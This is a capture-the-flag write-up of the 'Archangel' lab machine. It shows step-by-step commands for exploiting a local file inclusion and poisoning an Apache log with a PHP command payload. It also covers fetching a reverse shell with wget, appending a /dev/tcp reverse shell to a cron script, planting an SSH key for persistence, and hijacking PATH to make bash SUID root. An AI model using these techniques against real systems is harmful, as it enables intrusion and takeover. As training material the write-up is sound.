Archangel
Writeup.
Get a shell
1. Find a different hostname
mafialive.thm

2. Find flag 1
Add the domain name to
/etc/hosts
as :10.10.224.98 mafialive.thm

3. Look for a page under development
test.php

4. Find flag 2
thm{explo1t1ng_lf1}

Looking at the url, it's known to us that we have to exploit LFI
I tried looking for
/etc/passwd
but seems like we can few files that are under current directory.If we use
php filter
and converttest.php
into base64 we can read it.

5. Get user shell & flag.
The hint said
poison!!.
apache log poison it is!!!! (google search)
Url poisioning
i used following curl command for the log poision
βββ curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log" -H "User-Agent: <?php system(\$_GET['cmd']) ?>"
Log poison sucessfull !!

Reverse shell
I used pentest monkey's revshell
Start a python server in your local system & run the following command :
make sure you change ip & port
βββ curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget+YOUR_IP:PORT/revshell.php" #-H
so i copied the .php file into machines using wget
& now when i visit
MACHINE_IP/revshell.php
i will get a reverse shell
Flag
ββ[ο ~/stuff/thm/archangel] [ο« 10.8.102.180]
βββ nc -nvlp 9001 [0]
Connection from 10.10.1.211:59838
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
15:03:46 up 1:03, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /home/archangel/user.txt
<REDACTED>
Root the machine
1. Get user 2 flag
There's a cronjob running the file in
/opt
(found through Linpeas)we have full write access on it, so let's edit it & get a stable shell
I am going to add my public key into the authorized keys of archangel.
get archangel shell
www-data@ubuntu:/opt$ echo "sh -i >& /dev/tcp/10.8.102.180/9099 0>&1" >> helloworld.sh
And we got the shelll
βββ nc -nvlp 9099 [0]
Connection from 10.10.1.211:41092
sh: 0: can't access tty; job control turned off
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)
----------stabalize shell
βββ cat ssh.sh [0]
#!/bin/sh
#
mkdir ~/.ssh
chmod 700 ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC18sGRBGlzuvZK0Koh9FX0TprCBJHe4H/piBsY6a66JaHHaCTAN73A1Sp1gQUEQRZrYBh1d59mHeEUK5IIlD+4slmQTs29mfkmYisTRWKzxyxdaCOrGaphdnVxFyPO4XP86DJQ2ejB/nQiiCsxa9CqVQix/m1C11cbuferNdkLezLWkP2O3VTeFswATTQaScSXu/hSHw3WoXOr1yS3Ceofmf5r1NvEZQC45eEqxa0ACiFBZY75A1EsDIYhsvpNeqbMtjLKq3GoA9TO6HnujGIjFgq5El9fMVDC9bxwNCTKXcvlv3YYKAJqY/fOs2EUj/nqwOj/ynXsTOY5vWM9MIvYtTra32IM1z6OpWKLPUOjJ22W8l6y+XfRfF6TGRNIes0mgclzdjWC9MHqiPGm68hQgF3Zm5PNBtP7n3j3UYzkZJLT2WlOff8osIGMIkROmlbnHxQR6mURgVBU5k+vH/P+iB9zLurB16ptI5vWEXoj6iz6p8Ip+0+sn/0a9hFWyPq9dPbUaRuHA1/Blyh6/7DA3JeOQ79RfCeIZA0JEEumsLDDhfUc7x2kGiSHt0uHZjBDEBM+oZm8dFO4fOXv/7JN1rE60J2zHRMz5YXKWFGMapq3PAAPKXbYW7A5PLjQEr80yEzf38GV1hKyvHI1IdNb21f/P7I08cijowmZ6mUhxQ== heapbytes@pm.me" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
Start python server
βββ python3 -m http.server 1111 [130]
Serving HTTP on 0.0.0.0 port 1111 (http://0.0.0.0:1111/) ...
10.10.1.211 - - [17/Sep/2023 15:33:56] "GET /ssh.sh HTTP/1.1" 200 -
Now ssh part.


2. Root flag
Question Hint
certain paths are dangerous
running the binary gives an error
cp: cannot stat '/home/user/archangel/myfiles/*': No such file or directory
taking note of the hint my guess is that the binary is using relative path so we can create our own
cp
& pwn the machine.
archangel@ubuntu:/tmp$ nano cp
archangel@ubuntu:/tmp$ cat cp
chmod +s /bin/bash
archangel@ubuntu:/tmp$ chmod 777 cp
i made in
/tmp
now let's add our
/tmp
to our path variable
archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH
archangel@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
archangel@ubuntu:/tmp$
--------------- ROOT FLAG
archangel@ubuntu:/tmp$ cd
archangel@ubuntu:~$ cd secret/
archangel@ubuntu:~/secret$ ./backup
archangel@ubuntu:~/secret$ /bin/bash -p
bash-4.4# id
uid=1001(archangel) gid=1001(archangel) euid=0(root) egid=0(root) groups=0(root),1001(archangel)
Last updated